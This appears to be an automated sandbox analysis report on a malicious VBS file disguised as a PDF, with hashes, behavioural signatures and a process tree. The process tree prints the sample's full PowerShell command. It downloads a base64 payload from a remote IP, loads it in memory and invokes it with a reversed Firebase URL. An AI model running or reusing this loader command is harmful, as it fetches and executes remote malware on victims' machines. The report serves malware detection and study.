Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
402s -
max time network
406s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
14/10/2022, 19:13
Static task
static1
Behavioral task
behavioral1
Sample
QKWERBD01BSNAS_002_PDF.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
QKWERBD01BSNAS_002_PDF.vbs
Resource
win10-20220812-en
General
-
Target
QKWERBD01BSNAS_002_PDF.vbs
-
Size
442KB
-
MD5
ef69b45b2a116ed60277d731e42c2f0e
-
SHA1
0f1b9734dd43a034c56360e603659568ab65f91d
-
SHA256
ace37f42d21bf2768add3a41954c1b5d41f85966af20de4483498c14ac4d8a7b
-
SHA512
c2d037d408ed9a199a15ae960b53c112e2887571e87325794cf49a6f8c15af18bba380544b565d7e0f96dd68c9cda8fc416c50d595640086c1e8f31c62ac7e10
-
SSDEEP
768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0I0gAOAqAn:7aW1AP4lgK
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1292 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1292 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 112 wrote to memory of 1292 112 WScript.exe 27 PID 112 wrote to memory of 1292 112 WScript.exe 27 PID 112 wrote to memory of 1292 112 WScript.exe 27
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QKWERBD01BSNAS_002_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('2fc2e069481e-e589-8744-a310-1ce6957b=nekot&aidem=tla?txt.dsderpsO/o/moc.topsppa.swdldk/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292
-